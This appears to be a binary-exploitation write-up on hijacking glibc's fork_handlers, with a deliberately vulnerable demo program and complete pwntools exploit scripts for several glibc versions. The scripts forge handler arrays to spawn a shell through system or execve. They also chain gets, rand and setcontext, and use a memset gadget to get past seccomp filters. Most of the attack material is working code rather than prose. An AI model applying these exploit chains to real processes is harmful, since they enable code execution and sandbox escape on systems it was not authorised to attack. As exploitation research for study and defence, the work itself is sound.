fork_handlers

The forgotten brother of __exit_funcs

Some of you may be familiar with the exit handlers which are ran when calling exit(). These are typically used to clean up anything before the program is terminated, but they're also quite useful for attackers to hijack code execution. They're ideal, because by overwriting the __exit_funcs array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're popular for attackers, they employ pointer mangling on the function pointers.

However there are other places where handlers like these are used, and one place I stumbled across when investigating the exit handlers, was the fork handlers, and after some investigation, I found some tricks to abuse the fork handlers to convert fork into a constraintless one gadget.

What are the fork handlers?

fork has its own handlers for multiple situations:

  • prepare_handler

  • parent_handler

  • child_handler

These are stored in a single array/linked list called fork_handlers, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specifc order. There are a few things that separate these from exit handlers:

  • No pointer mangling.

  • No argument control.

So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in ret2gets. To see that, let's have a closer look at fork across multiple versions, as the implementation of the handlers as changed, which also changes how we'd abuse them.

2.28-2.35

(The specific version used here is 2.35)

Let's first have a look at what a fork_handler looks like:

  • prepare_handler: Handlers to prepare the process to fork, so they're run before the fork.

  • parent_handler: Handlers run as the parent after the fork.

  • child_handler: Handlers run as the child after the fork.

  • dso_handle: A unique id to identify which binary/shared library registered this handler.

These are stored in an array called fork_handlers, which is defined as:

The way this definition works is by stating a few "parameters" using macros, then including malloc/dynarray-skeleton.c, which then defines a struct called fork_handler_list, plus a bunch of handlers for this struct.

These dynarray structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields:

struct fork_handler_list {
        size_t size;
        size_t allocated;
        struct fork_handler* array;
        struct fork_handler scratch[48];
};

fork is defined as follows:

Here we call __run_fork_handlers with atfork_run_prepare, indicating it wants to execute the prepare handlers.

So now it will go through the array from the last element (for backwards compatibility reasons), executing each prepare_handler if they exist. The methods fork_handler_list_size and fork_handler_list_at are some of methods automically defined when we defined fork_handler_list, which just index the array and get the length (used) respectively. Locking may also be used, if there are multiple threads running.

So what?

At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

First it checks the first argument edi, and if it's 0, then it means it should run the prepare handlers. Then checks if it should use locking, if so, jump to +288, where it will lock, then resume by jumping back to +23.

But then something interesting happens. [fork_handlers] is loaded into rbp (which corresponds to fork_handlers->used), then is loaded into rdi. How interesting! It then goes on to call the prepare_handler:

So theoretically, controlling the field used could grant us rdi control.

Why does this happen?

The reason for this is the same reason why ret2gets works. Let's go back to +84 (when the index is decremented):

+91 checks the index rbp is within the bounds of the array (less than used). If it's not, then it goes on to call __libc_dynarray_at_failure, interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when used gets loaded. It could load used into any register, but chooses rdi, because in the case where this error happens, it doesn't need to waste time loading it into rdi again, because it's already there.

Exploitation

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

int main() {
    setup();

    printf("%p\n", &fgets);
    printf("Enter address, size and data: ");
    unsigned long addr, size;
    scanf("%zu %zu ", &addr, &size);
    fgets((void*)addr, size, stdin);
    fork();
}

To demonstrate this, we'll use the very realistic application attack scenario above, where we have a libc leak, an arbitrary write, and a call to fork we want to hijack.

We can start by writing some basic methods to create the structures:

def header(addr, size):
    return flat({
        0x00: size,
        # we don't need to control allocated
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

So we can use handler_array(libc.sym.system) to craft an array that will execute system, but we now need to control rdi. We can do this by setting used to some pointer to /bin/sh. However if we use a regular address to point to the handler array, then the large used field will cause it to access invalid memory, as it will access the last handler. So if we need used to be an address, why don't we just alter the address of the handler array. As long as

fork_handlers->array[fork_handlers->used-1]

points to our handler, then it'll work. We can forge such an address as follows:

addr = (addr - (size-len(funcs))*0x20) % (1<<64)

Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless __register_atfork or __unregister_atfork is used). Putting this all together, we can arrive at the following exploit:

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)

p = e.process()

fgets = int(p.recvline(), 16)
log.info(f"fgets: {hex(fgets)}")

libc.address = fgets - libc.sym.fgets
log.info(f"libc: {hex(libc.address)}")

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x20) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00")))

assert b"\n" not in data
p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()

Is that all we can do?

This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to execve, meaning calling system is useless now! Is that all we can do with a function call with a controlled argument? Yes, thanks for reading.

This is where setcontext comes in! I covered this already here, but basically this allows us to get ROP through the use of a function resembling the sigreturn syscall. We can substitute this in as follows:

def setcontext(regs, addr):
	frame = SigreturnFrame()
	for reg, val in regs.items():
		setattr(frame, reg, val)
	# needed to prevent SEGFAULT
	setattr(frame, "&fpstate", addr+0x1a8)
	fpstate = {
	0x00: p16(0x37f),	# cwd
	0x02: p16(0xffff),	# swd
	0x04: p16(0x0),		# ftw
	0x06: p16(0xffff),	# fop
	0x08: 0xffffffff,	# rip
	0x10: 0x0,			# rdp
	0x18: 0x1f80,	    # mxcsr
	}
	return flat({
	0x00 : bytes(frame),
#	0xf8: 0					# end of SigreturnFrame
	0x128: 0,				# uc_sigmask
	0x1a8: fpstate,			# fpstate
	})

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

For demo purposes, I'm just executing execve, but you can do much more with setcontext.

gets

Both of these examples require the /bin/sh string or the SigreturnFrame to already exist in memory, or be apart of the arbitrary write. But what if we don't have such a luxury? Well since rdi will be controlled for every function call, we can use gets to write data to the argument, before using it for system:

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200)
assert b"\n" not in data
# could also be any command we wish
extra_data = b"/bin/sh"

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()

Or setcontext:

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200,
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()

Seccomp strikes back!

Our good old friend enemy seccomp isn't always easily defeated by setcontext, because there's a nuisance I have yet to cover. If we have another look at setcontext:

We see that it executes a syscall before it sets the context, with syscall number 0xe. This is sigprocmask, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like seccomp's strict mode), meaning this could invoke seccomp's wrath.

What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in rdx, not rdi, so we'd need to control rdx somehow.

Wouldn't it be nice if we could convert our current rdi control into rdx control, because rdx isn't used by __run_fork_handlers. Well it turns out there is a gadget that can do just that!

Exactly one in fact. However if you're anything like me (and I surely hope not), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

It seems to belong to a function __memset_erms, which in hindsight makes sense. It explains the rep stos instruction: it's filling the buffer with the character al. And since rep stos increments rdi, it needs to save a copy, so that it can return that original pointer, as that's the defined behaviour of memset.

But why did it compile like this, and why is rdx used, surely this could change, right? Well let's find out:

Turns it the reason it compiled that way, is because that's exactly how libc wanted it: it used assembly language (.S is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:

  • It's simple, so not much to change in the first place.

  • If it ain't broke, don't fix it.

  • It's not actually used, it's just used for performance measuring.

Fantastic, we have a mov rdx, rdi gadget! But one final snag, we ideally want to set rcx or rdx to 0 before this gadget executes, so that rep stos finishes immediately (i.e. doesn't run).

Putting this all together, we arrive at the following:

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()

2.28-2.29

There's a weird edge case that I found with 2.28-2.29, which seems to coincide with the versions that didn't have the do_locking argument (which was added in 2.30).

Above we see that the used field is loaded into rax, but not into rdi. But after the first call:

used is loaded into rdi. Weird...

I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a ret to get past the first call, which would also be compatible with 2.30+.

And if it doesn't happen at all?

Well, rdi shouldn't be used by anything else if it's not used for used, so ret2gets would also be a possibility, however I am yet to test it.

2.36+

(The specific version used here is 2.39)

You'll have noticed that the previous section was specifically for 2.28-2.35. This is because the implementation of fork_handlers changes throughout the versions. So, what's changed now?

Well, not much actually. Firstly, the fork_handler struct has a new field: id

And a separate function for running prefork handlers has been created:

The function for running prefork handlers isn't much different either:

The main addition is the use of id. What seems to be implied by the comments here, is that now each handler has a unique id, which increments each time a new one is added. This means ones added later will have a larger id. Due to the different locking pattern here, handlers could be de-registered and/or registered when a prepare_handler is being executed, so it ensures that only ones that were present before the current one was are executed, therefore skipping ones with a higher id.

For us, all this changes is that the structure of fork_handler is different, and we just need to include an id field, where it's increasing with each handler. The updated handlers are as follows:

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x28*len(funcs))
    for i, func in enumerate(funcs[::-1]):
        off = i*0x28
        data[off:off+8] = p64(func)
        data[off+0x20:off+0x28] = p64(i)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x28) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

Revenge of the seccomp!

While these changes don't affect the regular cases for system("/bin/sh") or setcontext, it (indirectly) affects the setcontext case where we need to skip sigprocmask. In the version of glibc I used for the demo, rdx is used by __run_prefork_handlers:

Here we see at +128 that rdx=5*r14, where r14 is sl (the number of handlers). rdx then gets multiplied by 8, which ultimately means r14 got multiplied by 40/0x28, (the size of fork_handler). This is in preparation for the loop where it checks the id fields, which is why it actually points to the previous handler's id field (-0x30 instead of -0x28).

In this case, we can actually set used to a value that, when multiplied by 5, points to a context. This will make rdi a junk value, which means you can't use gets to populate the context (RIP), but apart from that, it's no problem!

ret = ROP(libc).find_gadget(["ret"]).address

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
addr_ctx += (-addr_ctx) % 5
rdi = addr_ctx // 5

data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi)
data = data.ljust(addr_ctx-addr, b"X")
data += setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.interactive()

2.27 and prior

(The specific version used here is 2.27)

You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how fork_handlers is implemented, but also how they're exploited. This is because we no longer have the rdi control trick through the used field.

fork_handler is now defined as:

A few more fields than before:

  • next: Points to next handler, as __fork_handlers is now a singly linked list.

  • refcntr: Reference count of this handler.

  • need_signal: Unused in fork, so we'll ignore it.

We're no longer using a dynarray, so there is no used field to control to gain rdi control (cringe). Let's have a look at fork then:

Not much so far, it just checks THREAD_SELF for if the process is multi-threaded. There's also no function for handing the fork handlers anymore: it's incorporated into fork itself.

First it needs to access the root of the linked list of handlers: __fork_handlers. However since the process could be multi-threaded and they didn't dicover locking yet it needs to do it in a thread-safe way (hence the weirdness with atomic_full_barrier etc.) but the jist is that it will grab __fork_handlers if it exists, and (atomically) increment the refcntr to claim ownership of it, ensuring it doesn't get freed while it's in use here.

A lock doesn't seem to be needed, as the fork_handler entries are constant (besides refcntr, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.

This now seems familiar, but instead of an accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can the same ones later for parent_handler and child_handler. To do this, it needs to claim ownership, so it increments the refcntr.

Importantly, there's no function calls with arguments present here, except for alloca (compiler builtin) and atomic_increment (asm block). So unlike 2.28+, there's no rdi control, because no functions (with a first argument) are called.

We can write methods to forge a fork_handler list as follows:

def forge(addr, *funcs):
    assert funcs
    data = b""
    for i, func in enumerate(funcs):
        next = addr+len(data)+0x30
        data += flat({
            0x00: next if i==len(funcs)-1 else 0,
            0x08: func,
            0x28: p32(1),
        }, length=0x30)
    return data

def forge_packed(addr, *funcs, smallest=False):
    assert funcs
    if smallest:
        # some refcntrs are outside our data
        # (except the first one, which we need to control)
        # these will be incremented, and potentially corrupt some memory
        # be careful when using this
        size = max(0x28+4, 0x10*len(funcs))
    else:
        # all refcntrs are contained in our data
        size = 0x28 + 0x10*len(funcs) - 0xc
    data = bytearray(size)
    addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0]
    for i, (addr, func) in enumerate(zip(addrs, funcs)):
        off = i*0x10
        data[off:off+0x10] = p64(addr) + p64(func)
    for i in range(len(funcs)):
        off = 0x28 + 0x10*i
        if off+4 > len(data):
            break
        val = u32(bytes(data[off:off+4])) - 1
        # the first refcntr must be non-zero
        # otherwise it'll loop forever
        if i == 0:
            assert val != 0
        data[off:off+4] = p32(val % (1<<32))
    return bytes(data)

You can do a standard array (forge), or you can utilise the unused space to pack it as much as possible (forge_packed). Both must contain at least the first refcntr though, as we need to ensure that that is non-zero. The rest of the refcntr's will be incremented, and if these are outside our data, they might corrupt other data, but if that's not a concern, then you can use smallest=True.

ret2rand

Therefore the only way we can control rdi is through prepare_handler calls. We need a function that will populate rdi with some writable address, which we could then write to using gets. ret2gets is unfortunately not very applicable here, as it's quite limited prior to 2.30 (see here).

Thankfully, I was able to find an alternative: rand.

rand is a psuedo random number generator, and with that comes the need to keep track of the random state. In this case, that state is unsafe_state, which is of type random_state:

This state is passed to __random_r, as the first argument 👀. What's more is that __random_r is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep unsafe_state in rdi (we'll look at this in a bit).

But what about the locking?

Well that's a good question, because we've seen before (in ret2gets) that locking lock can result in lock being loaded into rdi.

Ah, it's our good ol' friend lll_unlock.

Just like in ret2gets prior to 2.30, it only unlocks by using lll_unlock_wait_private when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch rdi.

The multi-threaded case is a bit more complex, but if it's locked with the value LLL_LOCK_INITIALIZER_LOCKED (1), then it also doesn't touch rdi (yay). However, lock can also contain the value LLL_LOCK_INITIALIZER_WAITERS (2), in which case the dec won't result in 0, and will execute lll_unlock_wait_private, thus clobbering rdi.

This should be unlikely to happen to rand's lock, as you'd need multiple threads trying to access rand at the same time, but it's not impossible, so be careful.

Exploitation

So let's go back to random, specifically __random_r. We can use rand followed by gets to write to the unsafe_state, but we'll need to call rand again to put unsafe_state back into rdi after gets. And if we call rand using a corrupted unsafe_state, then we could cause a crash?

So we need to conform to random_state:

But this contains multiple pointers, including at the beginning, where we might want to put /bin/sh string for example! But are these always used? Let's check __random_r:

At first glance, we can see the fptr, rptr, state pointers being used in the else clause. However, there's an interesting case: buf->rand_type == TYPE_0. This seems to be much simpler, and doesn't use fptr or rptr! It does still use state, but as long as it's populated with a writable address, it won't SEGFAULT. The default rand_type is TYPE_3, but we can easily overwrite it to TYPE_0.

Putting this together, we arrive at the following for system("/bin/sh"):

addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,    # the previous `state` field
    0x18: p32(0),   # TYPE_0
})
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()

We're also able to use this for setcontext:

addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

ucontext = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": libc.sym.unsafe_state+0x200
}, libc.sym.unsafe_state)

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,
    0x18: p32(0),   # TYPE_0
})
extra_data += ucontext[len(extra_data):]
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()

Return of the seccomp

This time our work is actually mostly done for us, because 2.27 and prior, setcontext doesn't use rdx for the ucontext.

So it's just as simple as jumping to setcontext+37 (or later).

Detecting arguments to handlers

It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with ret2gets, which will trace fork with angr, and log what the arguments to each call to prepare_handler were.

detect_fork.py

fork -> one_gadget

So why would we care about this? I mean sure, we can control fork to either execute system for a shell, or setcontext for ROP/shellcode, but that's only useful is there are calls to fork. Not all applications will use fork after all.

What about functions in glibc? Surely some of them will use fork, after all there's functions like system which would create a new process to execute a shell command, right?

Well unfortunately not many glibc functions use __libc_fork.

The rest, like system or popen will use an inlined clone call.

Well, like I mentioned in the beginning, by overwriting fork_handlers, we effectively have turned fork into a one_gadget. However, this has a few benefits over a regular one_gadget:

  • No constraints.

  • Can trigger ROP.

So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.

However, a lot of what's been done here can also be done with exit, and easier as well, as that has explicit argument control, the only downside there is that you have to deal with pointer mangling too.

In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)

Last updated